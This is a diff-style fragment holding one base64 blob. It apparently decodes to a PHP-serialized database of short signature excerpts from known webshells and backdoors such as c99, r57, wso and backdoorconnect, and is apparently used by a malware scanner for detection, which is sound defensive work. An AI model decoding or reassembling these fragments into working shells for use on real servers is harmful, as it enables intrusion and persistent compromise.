+WzFdW3BocF0iO3M6NjQ6IlBEOXdhSEFLSkdWdWRISjVYMnhwYm1VOUlraEJRMHRsWkNCaWVTQkZi
+blJ5YVV0aElqc0tKR1p3SUQwZ1ptOXciO3M6MTg6ImVudHJpa2FbMF1bMF1bcGhwXSI7czo2NDoi
+bGVIUTFOQ2M5UGlmRGo4T3V3NmpEc2NPcUlNT3l3NlhEcXNPeHc3TERvQ0REb2lERHRNT2d3Nm5E
+cThPZ3c3VSI7czoxNDoicjU3WzNdWzBdW3BocF0iO3M6NjQ6Im5XVEpHZWxwVFFXbGpSMUp0U1dw
+dlowcEhUakJsV0VKc1VGTkthR05JUW5OaFYwNW9aRWRzZG1KcE9YZGFSMWwiO3M6MTk6ImI2NHNo
+ZWxsWzBdWzBdW3BocF0iO3M6NjQ6Ik9TVXc0VVUxeVdGVmpZMHBHWWt4NmJrSjBNME54WVdJNWRs
+RjRWMmhMVUdGMksyOWhNa0Z5VVdaM1NqWTRMMEoiO3M6MjA6InN0dW5zaGVsbFszXVswXVtwaHBd
+IjtzOjY0OiJtNWxZM1JDWVdOcklFSmhZMnRrYjI5eUlIWnpJREV1TUNCaWVTQk1iM0pFSUc5bUlF
+bFNRVTRnU0VGRFMwVlNVIjtzOjI1OiJiYWNrZG9vcmNvbm5lY3RbMF1bMF1bcGxdIjtzOjY0OiJp
+Ym05b2RYQWdMM1J0Y0M5dWMzUmZZbVFnSmlJcE93cDFibXhwYm1zb0lpOTBiWEF2Ym5OMFgyTmZZ
+bVF1WXlJIjtzOjE4OiJuc3R2aWV3WzFdWzBdW3BocF0iO3M6NjQ6ImxPdzBLRFFvZ0lDQjlEUW9O
+Q2cwS0RRcG1kVzVqZEdsdmJpQm5aWFJmY0dWeWJYTW9KR1p1S1EwS0RRcDdEUW8iO3M6MjA6Im4z
+ZmE1dDFjYVswXVswXVtwaHBdIjtzOjY0OiJXQ2N1SnpKT2RtSnVKeTRuVW14bFNGSW5MaWRtV1RO
+S2JGbFlVaWN1SjJ3bktTeGlZWE5sTmpSZlpHVmpiMlJsIjtzOjE3OiJpZnJhbWVbMF1bMF1bcGhw
+XSI7czo2NDoiTVR3bFFDQlFZV2RsSUV4aGJtZDFZV2RsUFNKS2MyTnlhWEIwSWlVK1BDVmxkbUZz
+S0ZKbGNYVmxjM1F1U1hSbCI7czoxNToiY21kWzM2XVswXVtwaHBdIjtzOjEzNToiYmI6SkY5YlhU
+MHJLeVJmWHpzZ0pGOWJYVDBrWDFzdExTUmZYMTFiSkY5ZlBqNGtYMTlkT3lSZld5UmZYMTB1UFNn
+b0pGOWZLeVJmWHlrcklDUmZXeVJmWHkwa1gxOWRLUzRvSkY5Zkt5UmZYeXNrWDE4cEt5UmZXeVJm
+WHkwa1gxOWRPdz09IjtzOjE1OiJjbWRbMjddWzBdW3BocF0iO3M6NjQ6ImRHWnZjbTBuWFNrcERR
+b2dJQ0FnZXcwS0lDQWdJQ0FrWmlBOUlDUmZSMFZVV3lkbWFXeGxKMTA3RFFvZ0lDQWciO3M6MTk6
+IjEyMDY2N2trWzBdWzBdW3BocF0iO3M6NjQ6Ik5MM2RCZFRKMWJsSmhlbEpxVlVseVlYTlFjMnBY
+VVdWNEswOUZjRXBEV25wVFJ6UmtRekZZU2paelMwTlVXa04iO3M6MjA6InN0dW5zaGVsbFs0XVsw
+XVtwaHBdIjtzOjY0OiJqNDhhVzV3ZFhRZ2JtRnRaVDBpWTIxa0lpQjBlWEJsUFNKMFpYaDBJaUJ6
+YVhwbFBTSXhNemdpSUhaaGJIVmxQIjtzOjE1OiJjbWRbMjhdWzBdW3BocF0iO3M6NjQ6IjhMM1Jo
+WW14bFBpSTdDZ29nSkhCbGNtUnBjaUE5SUVCd1pYSnRhWE56YVc5dWN5aG1hV3hsY0dWeWJYTW9K
+SFIiO3M6MTY6InhpbmZvWzBdWzBdW3BocF0iO3M6NjQ6Ik5mWVhKeUlEMGdKRzV2ZEd4eklEMGdi
+blZzYkRzS0pIVmtJRDBnZFhKc1pXNWpiMlJsS0NSa0tUc0tQejQ4YUgiO3M6MTU6ImM5OVsxMV1b
+MF1bcGhwXSI7czo2NDoiclFtcEhUVmsyTjFCQ1RYSjFkemhqTlhSbFRqSTFka1JGVjI0NWJrbGph
+amx6UW05cGJXTjJaVVZ1U0dFNFFXVSI7czoyMDoicGhwc2hlbGxbMjFdWzBdW3BocF0iO3M6NjQ6
+ImlBZ0lDQWdJR0p5WldGck93MEtJQ0FnZlEwS0RRb2dJQ0F2THlCWFlXbDBJSFZ1ZEdsc0lHRWdZ
+Mjl0YldGdVoiO3M6MjI6InNoZWxsYXRpbGRpWzBdWzBdW3BocF0iO3M6NjQ6IlIwYVVvMk1Ia3pN
+WEJCVDNCRVJubEtaVWRvYjA1VWJYQk9jVGhDVjNNd2VXRjZPRWx6VEd4Q2JVMW1RazlsZDIiO3M6
+MTk6ImZpbGVzbWFuWzRdWzBdW3BocF0iO3M6NjI6IklDaHVjM1FwSUhkb2FXTm9JR3g1Ym5nTkNr
+bHpJR3hwYm10eklHbHVjM1JoYkd4bFpEOGdLRzV6ZENrZ2QyIjtzOjE4OiJuc3R2aWV3WzNdWzBd
+W3BocF0iO3M6NjQ6ImJXRnBiQ2h6S1NFaUtUc05DZzBLZlEwS1pXTm9ieUFpVTNWalkyVnpjMlox
+Ykd4NUlITmxiblFnYldGcGJDaHoiO3M6MjM6ImJsb29kM3Jwcml2OFswXVswXVtwaHBdIjtzOjY0
+OiJaVDBpZEdWNGRDSWdibUZ0WlQwaWJuSmxibUZ0WlNJK0RRbzhhVzV3ZFhRZ2RIbHdaVDBpYzNW
+aWJXbDBJaUIyIjtzOjIyOiJzdGFrZXJzaGVsbFswXVswXVtwaHBdIjtzOjY0OiJnUFNBaVpuVnVZ
+M1JwYjI1eklpa2dld29nSUNBZ0lDQWdJQ0FnSUNCcFppQW9KSE4wWVhSbFBUMHhLU0I3Q2lBIjtz
+OjE2OiJteXNxbFs1XVswXVtwaHBdIjtzOjY0OiJBOUlDSmtaWFpwYkhwVGFHVnNiQ0k3RFFva2My
+aGxiR3hmWm1GclpWOXVZVzFsSUQwZ0lsTmxjblpsY2lCTWIyIjtzOjIyOiJkZXZpbHpzaGVsbFsx
+XVswXVtwaHBdIjtzOjY0OiJ5WWpNVFl3TlRzbUl6RTJNRGc3SmlNeE5qQXlPeVlqTVRVNU16czhM
+Mlp2Ym5RK1BDOXpjR0Z1UGp4bWIyNTBJIjtzOjE0OiJjOTlbN11bMF1bcGhwXSI7czo2NDoiaGJX
+VXBPdzBLZlEwS1pXeHpaV2xtS0NSZlVFOVRWRnNuZEhsd1pTZGRQVDAzS1EwS2V3MEtaV05vYnlC
+aGJHbCI7czoyMDoicm9vdHNoZWxsWzBdWzBdW3BocF0iO3M6NjQ6IlJ6aE9lR3N3YjFCa1IxbEdZ
+Mk5CV0VWVFRUUnRhMWRLVERNMUwyWnFVVFEwVERoelZUUkZNMm94VDFacGJGQm4iO3M6MTQ6ImM5
+OVszXVswXVtwaHBdIjtzOjY0OiJITW9KSFkyTm1JeE9EZzJOaXdnTkRBNU5pa3BJSHNnSkhZNFpE
+YzNOMll6T0NBdVBTQWtkak0wTVdKbE9UZGtPIjtzOjE1OiJzcGFtWzFdWzBdW3BocF0iO3M6NjQ6
+IklHUmxiR1YwWlNCMGFHVWdaM3BwY0NCbWFXeGxJR0ZzYzI4dUlFa2djbVZqYjIxdFpXNWtJR3hs
+WVhacGJtY2ciO3M6MTc6ImJhY2t1cFsxXVsyXVtwaHBdIjtzOjY0OiJwWmlocGMzTmxkQ2drWTIx
+a1d6RmRLU0FtSmlBa1kyMWtXekZkSUQwOUlqQXdNU0lwRFFvZ0lDQWdJQ0FnZXcwIjtzOjE1OiJw
+Ym90WzBdWzBdW3BocF0iO3M6NjQ6ImJreHVNMUZpVkZKamIwaFVhR3REUWxKVVNYcG5VazFaUVVa
+U2JWbHZOWEJJY1VGSGFucFdjV2hEWTNGblIzQmoiO3M6MTk6IndlYnNoZWxsWzBdWzBdW3BocF0i
+O3M6NjQ6ImlJaTRrY0hka0xpSmNJaUF2UGdvSkNUd3ZabTl5YlQ0S0NRazhMMlJwZGo0aU93b0pD
+U1J6WDNKbGMzVnNkQ0EiO3M6MTY6ImIzNzRrWzhdWzBdW3BocF0iO3M6NjQ6IjFaMlVETTNURVZC
+VkdGdlVYQkVVRzAwVDFOellucFRlVTEwWWk5MmVqQkpOVzltUkdwMU56WTBiMG95TlZSaVciO3M6
+MTQ6ImM5OVswXVswXVtwaHBdIjtzOjY0OiJJQ0FnSkhCeVkzTWdQU0JoY25KaGVTZ3BPdzBLSUNB
+Z0lDQWdkVzV6WlhRb0pITjBZV05yV3pCZEtUc05DaUFnIjtzOjIyOiJGYVRhTGlzVGlDelsxXVsw
+XVtwaHBdIjtzOjY0OiJ4dmNqMGlVbVZrSWo0Z0NpQWdJQ0FnSUNBZ0lDQThkR1Y0ZEdGeVpXRWdi
+bUZ0WlQwaVpIVjZaVzU0SWlBS0lDIjtzOjE5OiJrbGFzdmF5dlswXVswXVthc3BdIjtzOjY0OiJT
+V1ZIWkVSRFpXUkxWa3BmVGtGUE5ua3FkSGxuY2tocWNDcE1ORXBhT1hwQmVrNXpaa2xYVEUxQ05G
+cEhNblJ5IjtzOjE1OiJ3c29bMTRdWzBdW3BocF0iO3M6NjQ6ImlBa2NHOXlkR0VzSUZCeWIzUnZJ
+RDArSUNkMFkzQW5MQ0JVYVcxbGIzVjBJRDArSURRcE93b2dJQ0FnSUNBZ0kiO3M6MTg6InNoZWxs
+Ym90WzFdWzBdW3BsXSI7czo2NDoiVEF3SlNJZ2FXUTlJa0YxZEc5T2RXMWlaWEkwSWlCb1pXbG5h
+SFE5SWpFNUlqNEtJQ0FnSUNBZ0lDQWdJRHgwYyI7czoxNzoicGh2YXl2WzBdWzBdW3BocF0iO3M6
+NjQ6ImxsYm5SbExUNXlaVzF2ZG1Vb0pHWm9LVHNLSUNBZ0lDQWdKR1pvTFQ1amJHOXpaVHNLSUNB
+Z0lDQWdaR1ZzWlgiO3M6MTU6InpvcnJvWzFdWzBdW3BsXSI7czo2NDoic2JtdGhTSE41VlRZNFNI
+cHhTa3R5Tmk5bU4zbFpUVmh5WVdOV1luZG1UMVpxVEhobVRtTTNkVmgwSzNaMGNEbCI7czoxNDoi
+aTQ3WzBdWzBdW3BocF0iO3M6NjQ6Ino1Y2JpSTdDaUFnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0Fn
+Y0hKcGJuUWdJbE5qY21sd2REb2dQR0p5SUM4K1AiO3M6MTc6Imxvc3RkY1swXVswXVtwaHBdIjtz
+OjY0OiJDOHZaUzVuSUNKak9pSXNJQ0l2SWl3aUwyaHZiV1VpQ2lSMGFXMWxiR2x0YVhRZ1BTQTJN
+RHNnTHk5c2FXMXBkIjtzOjE1OiJjOTlbMTJdWzBdW3BocF0iO3M6NjQ6IjNWc2RBb2diSFpCZEhS
+eWFXSjFkR1Z6SUQwZ1UzQnNhWFFvUTI5dWRtVnlkRUpwYm1GeWVTaEJkSFJ5YVdKMWQiO3M6MjM6
+InJlbW92ZXhwbG9yZXJbMF1bMF1bdmJdIjtzOjY0OiJvSVdaMWJtTjBhVzl1WDJWNGFYTjBjeWh6
+YUdWc2JGOWxlR1ZqS1NsN0pHOXdiM0E5Y0c5d1pXNG9KRzlqYldRIjtzOjE3OiJla2luMHhbMF1b
+MF1bcGhwXSI7czo2NDoiQ0FnSUNBZ2NISnBiblJNYjJkcGJpZ3BPdzBLQ1VCcGJtbGZjMlYwS0Nk
+dmRYUndkWFJmWW5WbVptVnlhVzVuSiI7czoyMDoiMW43M2N0aW9uWzFdWzBdW3BocF0iO3M6NjQ6
+IklEd3ZkR1ErUEhSa1BqeG1iMjUwSUdOdmJHOXlQWGxsYkd4dmR6NTVZWHB0WVNCNVpYUnJhWE5w
+SUhaaGNpRTgiO3M6MTc6InplaGlyNFswXVswXVthc3BdIjtzOjY0OiIyWVhJZ2N5eGhMR2tzYWl4
+eUxHTXNiQ3hpUFdSdlkzVnRaVzUwTG1kbGRFVnNaVzFsYm5SelFubFVZV2RPWVcxIjtzOjE1OiJ3
+c29bMjBdWzBdW3BocF0iO3M6NjQ6Ims3RFFvZ0lDQjlEUW9nSUNCcFppQW9YQ1JqWVhObElEMStJ
+QzllYlhOblhITXJLRnhUS3lrZ0tDNHFLUzhwSUgiO3M6MjA6ImVneXNwaWRlclsxXVswXVtwaHBd
+IjtzOjY0OiJUZHlJN0RRb2tjRzl5ZEZzeU1UQTJYU0E5SUNKTldrRlFJanNOQ2lSd2IzSjBXekl4
+TkRCZElEMGdJa1JsWlhCIjtzOjE0OiJnZnNbMl1bMF1bcGhwXSI7czo2NDoiMldsVXphMmhFVEV0
+RGJHeHliMnMwUjA1WFNGZG5jMU5VZVZocE0xZHZkVmxMV0RWbVUweHlXR3h5U0ZsV1NrZCI7czoy
+NToic2hlbGxfdXBsb2FkZXJbOV1bMF1bcGhwXSI7czo2NDoiRGV5UmtZMk56YjJOcmZYdGpkWEpp
+ZVhSbGZTQTlJREE3RFFvZ0lDUkVRME43SkdSalkzTnZZMnQ5ZTJGeWNYViI7czoxODoic2hlbGxi
+b3RbMF1bMF1bcGxdIjtzOjY0OiIzZ3NKR1YwTENSbWIyOTBaWElzSkdoamQyUTdEUXBsWTJodklD
+YzhhVzFuSUhOeVl6MGlhSFIwY0RvdkwzY3diIjtzOjE1OiJvYmV0WzBdWzBdW3BocF0iO3M6NjQ6
+IjI5eVlYUnBiMjQ2Ym05dVpRcDlDaTh2TFMwK0Nqd3ZjM1I1YkdVK0Nqd3ZhR1ZoWkQ0S1BHSnZa
+SGsrQ2p3L0MiO3M6MTY6Im15c3FsWzFdWzBdW3BocF0iO3M6NjQ6ImtwS1NsN0RRcGxZMmh2S0NK
+VFlXWmxJRTF2WkdVZ2IyWWdkR2hwY3lCVFpYSjJaWElnYVhNZ09pQWlLVHNOQ20iO3M6MTU6ImNt
+ZFsyMl1bMF1bcGhwXSI7czo2NDoiRkkrQ2p3L2NHaHdDaUFnZlFvL1Bnb2dJRHhVVWo0S0NpQWdQ
+RlJFUGp4RVNWWWdVMVJaVEVVOUltWnZiblF0WiI7czoxNjoiaDRudHVbMF1bMF1bcGhwXSI7czo2
+NDoiZGZZbXhoYm1zbklHaHlaV1k5SnlSamIyNW1hV2NuUG1OdmJtWnBaend2WVQ0OEwzUmtQangw
+WkQ0aUxpUnlMaSI7czoxODoic3ltbGlua1sxXVswXVtwaHBdIjtzOjY0OiJOUU0yTnBORTFUY21s
+WGRrVlROVEZWYjJORlRFVXZVSGxaYUdOWmFrZHJialpSYldJelIwdzBPRkF3V0Zwa2JrIjtzOjE0
+OiJyNTdbNF1bMF1bcGhwXSI7czo2NDoiWW1zd2RrNVhOSFpSVlhCMVREQXdNV0pwT1dGalJ6UjJZ
+bFp3ZFV3emNFdGlhVGgyVDBoa1FsRlZNVE5SVTBsMSI7czoyMToibG9jdXNzaGVsbFswXVswXVtw
+aHBdIjtzOjY0OiJNeldqWmtiMEZhZVdkc2JXRkZaRmxtZGk5SmJtMXVhVlZJZEdWbVJFRkphWE5z
+UW1kQ1QyRTJha0phS3pCYWVVIjtzOjE5OiJmaWxlc21hblszXVswXVtwaHBdIjtzOjY0OiIwUWxS
+bWVVUm1abmRCUkRRMmNVRkJRVUZwTXpNNGFUQXdUWGRtT0VWVU5ERk5UV1o1UkM5Nk9USkJNbTh2
+V0RSIjtzOjE4OiJ3YWNraW5nWzBdWzBdW3BocF0iO3M6NjQ6IlJjZURZNWIyNWhiR3g1TENCY2VE
+WXhJRng0TXpRd05DQk9YSGcyWm5SY2VESXdYSGcwTmx4NE5tWmNlRGMxYm0iO3M6MTU6Indzb1sx
+N11bMF1bcGhwXSI7czo2NDoiazF2UVUwd04waExWVTkzUzJKMVJIZDZjM2R5ZFdKT2FuSmxWVVJH
+VjJkRVFrRjNZV3BDTTBGcFlVaEhkbVoxZSI7czoyMDoic3R1bnNoZWxsWzFdWzBdW3BocF0iO3M6
+NjQ6IkNSMk0yUXlObUl3WWpFcElIc2daMnh2WW1Gc0lDUjJOakU1WkRjMVpqZzdJR2xtSUNnaGFX
+NWZZWEp5WVhrb0oiO3M6MTU6InNwYW1bMF1bMF1bcGhwXSI7czo2NDoiRm9NR1E1VTBSU1Z6SnRU
+MkpZVWpsNGRGcDVjVVZhVm5wdWVuWjJRVWhhTURkemVtUkZOekJNVG10VVVVNWthMyI7czoyMDoi
+MW43M2N0aW9uWzJdWzBdW3BocF0iO3M6NjQ6IkNBZ0lDQWdMeThOQ2k4dkx5OHZMeTh2THk4dkx5
+OHZMeTh2THk4dkx5OHZMeTh2THk4dkx5OE5DZzBLRFFwcFoiO3M6MTk6InNhZmVtb2RlWzRdWzBd
+W3BocF0iO3M6NjQ6ImpJeU1qSXlNakl5TWpJeU1qSXlNakl5TWpJd29LSTFZZ1kyVnNhbUZvSUc1
+bGMyRnVhMk5wYjI1cGNtOTJZVzUiO3M6MTU6Imx1cm1bMF1bMF1bY2dpXSI7czo2NDoiazdJR1Y0
+YVhRN0lIMGdQejQ4UDNCb2NDQnBaaWhwYzNObGRDZ2tYMGRGVkZzaWREYzJNalJ1SWwwcEtYc2dJ
+QyI7czoxOToiZmlsZXNtYW5bN11bMF1bcGhwXSI7czo2NDoidmRISStYRzRpT3dvS0lDQUpaV05v
+YnlBaVBDOTBZV0pzWlQ0OEwzUmtQaUk3Q2dvZ0NXVmphRzhnSWp3dmRHRiI7czoyMDoicGhwc2hl
+bGxbMTZdWzBdW3BocF0iO3M6NjQ6IkdWdVpDSTdEUXBpY21WaGF6c05DZzBLRFFvdkwxQklVQ0JG
+ZG1Gc0lFTnZaR1VnWlhobFkzVjBhVzl1RFFwalkiO3M6MjE6ImthZG90c2hlbGxbMV1bMF1bcGhw
+XSI7czo2NDoibVp2Y21zN0RRb2dJQ0FnSUNBZ0lDQWdJQ0FnSUhONWMzUmxiU0FvWUNScmFXeHNa
+R0FwT3cwS0lDQWdJQ0FnSSI7czoxNzoiaXJjX2JvdFsxXVswXVtwbF0iO3M6NjQ6Im1JekV3Tnpj
+N0ppTXhNRGcxT3ljc0NpZHlkVjkwWlhoME5qUW5QVDRuSmlNeE1EUTBPeVlqTVRBNE1Ec21JekUi
+O3M6MTQ6InI1N1syXVswXVtwaHBdIjtzOjY0OiIyUmxkWE1nVUdWeWJDQlNaVzF2ZEdVZ1UyaGxi
+R3hjYmlJN0NncHplWE4wWlcwb1pHRjBaU2s3Q2dwemVYTjBaIjtzOjE4OiJhc21vZGV1c1swXVsw
+XVtwbF0iO3M6NjQ6IlBEOXdhSEFOQ21sbUtDUmZVRTlUVkZzaWEyVjVJbDBnUFQwZ0ltWXdaR1Zr
+TkRka1ptRTRZVE00WkdRME5tVTUiO3M6MTU6ImNtZFsxMF1bMF1bcGhwXSI7czo2NDoiNWhiV1U5
+TVNOamIyNTJaWEowUG0xa05Ud3ZZVDRwUEM5b01qNDhVRDRpT3dvS0lDQWdhV1lnS0NGcGMzTmxk
+QyI7czoyMToicmVtb3Rldmlld1swXVswXVtwaHBdIjtzOjY0OiJkWUszVm1NRmdyVlVSdVkwbEVN
+VEY0UldreVVrVlFhREJrVGpGa2JuRm9SVkY2YkRobmRsQnZUbGxtU0RGU2NYIjtzOjE0OiJyNTdb
+OV1bMF1bcGhwXSI7czo2NDoiSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDUmthWEpmYkds
+emRDQTlJR2x0WVhCZmJHbHpkQ2drYzNSeSI7czoyMzoic2hlbGxhcmNoaXZlWzBdWzBdW3BocF0i
+O3M6NjQ6ImduTDJodmJXVXZKeTRrZFhObGNpNG5MM0IxWW14cFkxOW9kRzFzTDJGalkyVnpYM2Rs
+WWk5amIyNW1hV2N1Y0ciO3M6MTk6InByaXY4X3NjclswXVswXVtwbF0iO3M6NjQ6InlPWEZtY0ha
+RVdqSXdlVlpWV0VGUUlpd2lNazk1TldoV1VYaFVZazlyUWxNcmFUUmFVRVZFWm5ObVNqRXpSa1Yi
+O3M6MjA6InBocHNoZWxsWzExXVswXVtwaHBdIjtzOjY0OiJsWFVrRnhPWEJRVTBKU2MwNTFZbmhr
+T1N0WVlXaDJkMDVsU1hGRWRGSllSSEV2ZUZGTFdFTmxWRGx4SzNRTkNrIjtzOjE2OiJiMzc0a1s3
+XVswXVtwaHBdIjtzOjY0OiJRdVlYQndaVzVrUTJocGJHUW9aV1JwZENrN1ptbGxiR1F1YzNSNWJH
+VXVaR2x6Y0d4aGVUMG5ibTl1WlNjN1pXIjtzOjI0OiJteXNxbF9hZG1pbmVyWzBdWzJdW3BocF0i
+O3M6NjQ6ImNtUmxjam9nTVhCNElITnZiR2xrSUNORFFrRkNOemc3SUgwS0kyTnZiblJsYm5RZ2V5
+QndZV1JrYVc1bk9pQXgiO3M6MjA6ImxvYWRzaGVsbFswXVswXVtwaHBdIjtzOjY0OiJCVlYzSTBj
+M0EwVUVVdmRYTkJRM3A1U0U1alF6UTVaMUU0VEVab1puUnhPREJCT0hWSVEzaFVLMGNyYVc1Q1Zt
+IjtzOjIwOiJmaWxlc21hblsxNl1bMF1bcGhwXSI7czo2NDoiWDJWNGFYTjBjeWdpYldGcGJDSXBL
+WHNOQ21WamFHOGdKSFJoWW14bFgzVndNUzRrYkdGdVoxc2tiR0Z1WjNWaCI7czoxNDoicjU3WzZd
+WzBdW3BocF0iO3M6NjQ6IlUxUkZ4YlhTOW5MQ0FpVzEwaUtUc0tDUWtKQ1ZSRWMyaGxiR3hmZEdG
+aWMxOXRiMlJwWm5sZmRHRmlLR04xY24iO3M6MTg6InRkc2hlbGxbMF1bMF1bcGhwXSI7czo2NDoi
+TUNrN0NRb2dhV1lvSVNSamIyNXVaV04wYVc5dUtTQjdJR1psS0NSc1lXNW5kV0ZuWlN3d0tUc2dm
+UW9nWld4eiI7czoxNToicjU3WzE5XVswXVtwaHBdIjtzOjY0OiJJaVJ5WldGc0wzTndiRzlwZEhv
+dWVtbHdJanNnUHo0aVBqeGljajQ4WW5JK0lBbzhhVzV3ZFhRZ2RIbHdaVDF6IjtzOjE0OiJjOTlb
+NF1bMF1bcGhwXSI7czo2NDoiUTdQQzltYjI1MFBpSXBPd29nSUNBZ0lDQWdJQ0FnSUNBZ0lDQThj
+Mk55YVhCMElIUjVjR1U5SW5SbGVIUXZhbSI7czoyMToicmVtb3Rldmlld1sxXVswXVtwaHBdIjtz
+OjY0OiJKRVpQVWsxN1JFWkpURVY5S1NsYk4xMDdDaUFnSUNna1ptbHNaVzVoYldVZ1BTQWtSazlT
+VFh0RVJrbE1SWDBwIjtzOjIyOiJwZXJsd2Vic2hlbGxbMF1bMF1bcGxdIjtzOjY0OiJkVFV5Y3NK
+M2RsZWpkUVZ6QTVSa1pXY0RkU1pFcHNKeXduYmtsSGNpdFhiRFpDVDNZNGNsUjVkVmNuTENkVldX
+IjtzOjIwOiJwaHBzaGVsbFsxMF1bMF1bcGhwXSI7czo2NDoiWDNJb0pFZE1UMEpCVEZNcE95Y3NE
+UW9KSjNCb2NGOXBibWtuQ1QwK0NTY2tTVTVKUFdsdWFWOW5aWFJmWVd4cyI7czoxODoiZHhzaGVs
+bFsyXVswXVtwaHBdIjtzOjY0OiJHUWdibTkzY21Gd1BpMHRQQzkwWkQ0bktUc0tDUWtKY0NnblBI
+UmtJRzV2ZDNKaGNENG5LVHNLQ1FrSmNDZ25QIjtzOjE3OiJwaHBzcHlbNF1bMF1bcGhwXSI7czo2
+NDoibHVaM01uWFZzblptbHNaUzExY0d4dllXUW5YU2tnZXlBL1BnbzhZbkkrUEdKeVBnbzhabWxs
+YkdSelpYUStDaSI7czoyMDoicGhwc2hlbGxbMTldWzBdW3BocF0iO3M6NjQ6IitTR1Y0UEM5MFpE
+NDhkR1FnZDJsa2RHZzlKekkxSlNjZ1ltZGpiMnh2Y2owbkl6STRNamd5T0NjK1BDOTBaRDQiO3M6
+MTc6ImphY2thbFs0XVswXVtwaHBdIjtzOjY0OiJnWEc0aU93cGxZMmh2SUNJOFlTQm9jbVZtUFNj
+a1VFaFFYMU5GVEVZL1lXTjBhVzl1UFhacFpYZEVZWFJoSm1SIjtzOjE2OiJteXNxbFswXVswXVtw
+aHBdIjtzOjY0OiJZM2xtUVdGWWFWbEJXRUl6UVZOQlNFZzBRM2xCWVVGWU5XMXdkbUZYTkc5S2VH
+WjNUMmxqYzBKRFJYQkdRa0k1IjtzOjE1OiJ3c29bMTNdWzBdW3BocF0iO3M6NjQ6InNJR1poYkhO
+bElDazdEUXBvWldGa1pYSW9JQ2RRY21GbmJXRTZJRzV2TFdOaFkyaGxKeUFwT3cwS0RRcGxZMmgi
+O3M6MjA6ImV4dHBsb3JlclswXVsyXVtwaHBdIjtzOjY0OiJWVGVYTjBaVzFQWW1wbFkzUWlLUW9K
+Q1ZObGRDQm1JRDBnWm5OdkxrZGxkRVpwYkdVb2MzUnlSbWxzWlc1aGJXIjtzOjE3OiJyaHRvb2xb
+MV1bMF1bYXNwXSI7czo2NDoiblF1UFNSc1lXNW5XeWQxY0d4dllXUnZheWRkT3dwOUNncHBaaWhw
+YzNObGRDZ2tYMUJQVTFSYkozVndiRzloWiI7czoyMToiZmF0YWxzaGVsbFswXVswXVtwaHBdIjtz
+OjY0OiJGWktUekpqV0c5b2NGWm1ORGtyVDJaMk4wbzRXRVk0ZDBSRk0wdFJLMlpSZGxwblQwSkVR
+bGhSWkhGSllqaG9UIjtzOjIwOiJwaHBzaGVsbFszNF1bMF1bcGhwXSI7czo2NDoiSFV3TURZelhI
+VXdNRFkxWEhVd01EWTBYSFV3TURZNVhIVXdNRFpEWEhVd01ETkNYSFV3TURJMlhIVXdNREl6WCI7
+czoxNToiY21kWzE5XVswXVtwaHBdIjtzOjY0OiJ5SWlrdVZtRnNkV1VLQ1cxaGVEMXZZbXBWY0d4
+dllXUXVSbWxsYkdSektDSnRZWGdpS1M1V1lXeDFaUW9LQ1daIjtzOjE3OiJ6ZWhpcjRbMV1bMF1b
+cGhwXSI7czo2NDoidldVOXJPSE54T0dWalVtcEliakZtVjBKNEt6TXlhbmRtVlhKQ2VuQTNXVWRK
+WkhsbE1scENiR2xLV25KaVpYUSI7czoyMDoicGhwc2hlbGxbMzZdWzBdW3BocF0iO3M6NjQ6ImMy
+aHphR1Y0YVhRb0tUdDlDbWxtSUNna1lXTjBJRDA5SUNKelpXTjFjbWwwZVNJcENuc0tJR1ZqYUc4
+Z0lqeGoiO3M6MTU6ImM5OVsyNF1bMF1bcGhwXSI7czo2NDoiZEdnaUxDSjNLeUlwT3dvSlpuZHlh
+WFJsSUNna1puQXNJaUlwSURzS0NXWjNjbWwwWlNBb0pHWndMQ1J6WVhabCI7czoyMjoic2ltYXR0
+YWNrZXJbMV1bMF1bcGhwXSI7czo2NDoiY2xkNWRHWlZNM05SUTJVNVlVWlliVk5OWkVOU1NFWjBS
+REJtTURaVVREZExlVzluT1VKWmRscFFSRVZUTkd4RCI7czoxNToid3NvWzE1XVswXVtwaHBdIjtz
+OjY0OiJJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FrWkc5elBTQWlRdlo1YkdVZ1FtbHlJRVJ2
+YzNsaElGWmhjbVI1IjtzOjE4OiJjYXN1czE1WzBdWzBdW3BocF0iO3M6NjQ6IjFsUFNReFhHNWNi
+aUk3Q2lBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0J3Y21sdWRDQjNhR2xzWlNnOFUwVk9SRVpKVEUiO3M6
+MTY6InRlbG5ldFswXVswXVtwbF0iO3M6NjQ6InlLRUJwYm1sZloyVjBLQ0p6WVdabFgyMXZaR1Vp
+S1NrZ1BUMGdJbTl1SWlrZ2V5QWdKSE5oWm1WdGIyUmxJRDAiO3M6MzY6ImNyaXN0ZXJjb3JwX2lu
+Zm9jb2xsZWN0b3JbMF1bMF1bcGhwXSI7czo2NDoiWnBaeTV3YUhBaUxBMEtDUWtpYkc5allYUmxJ
+R052Ym1acFp5NXBibU1pSUQwK0lDSnNiMk5oZEdVZ1kyOXVabSI7czoyMDoiZmlsZXNtYW5bMjRd
+WzBdW3BocF0iO3M6NjQ6ImpWRkJLVHpocmFFZHdaMjAxZDFoYVNscDBjbkZUYlU1MksydElTVkZJ
+T1U5clZVOWlhQ3RDUlZoRGNXNVNlVGwiO3M6MjI6InRiZHNlY3VyaXR5WzBdWzBdW3BocF0iO3M6
+NjQ6IkZVU0doU1UyNUtSVk5IZDNsT01XUmhUVEExWVdOWVZUQk9WRmt4VkRGV2FGcFdRbTVQVnpr
+MldYazVTRlF5VlQiO3M6MTU6Indzb1sxMl1bMF1bcGhwXSI7czo2NDoiRFZFMTRha1JVVDFaVVpW
+bDBTR0ZzYzBkMWJtTklWR3gyWTNKR2VFWXdXRnBWYlc1S1R6TnBXRU5OTVdwbWJFeCI7czoxOToi
+YmFja2Rvb3JbM11bMF1bcGhwXSI7czo2NDoiek12YjBwT1dtMU5OMDVRUW5JMVkzaHlhekJ6TlVR
+clUzRnFNa2hhWWs1bmNHcExLMmhFTTBjaUxDSkllazVQViI7czoyNToic2hlbGxfdXBsb2FkZXJb
+NF1bMF1bcGhwXSI7czo2NDoiVng0TkRoY2VEWTJYSGd6TTF4NE5EbGNlRFUwWEhnMVpWeDRObUpj
+ZURNMVhIZzBNRng0TTJOY2VEWTVYSGd6TiI7czoxODoicG9zdG1hblswXVsxXVtwaHBdIjtzOjY0
+OiJObFltVmlaV0luUGcwS1BHTmxiblJsY2o0TkNqeGlQanhtYjI1MElITnBlbVU5SnpZbklHWmhZ
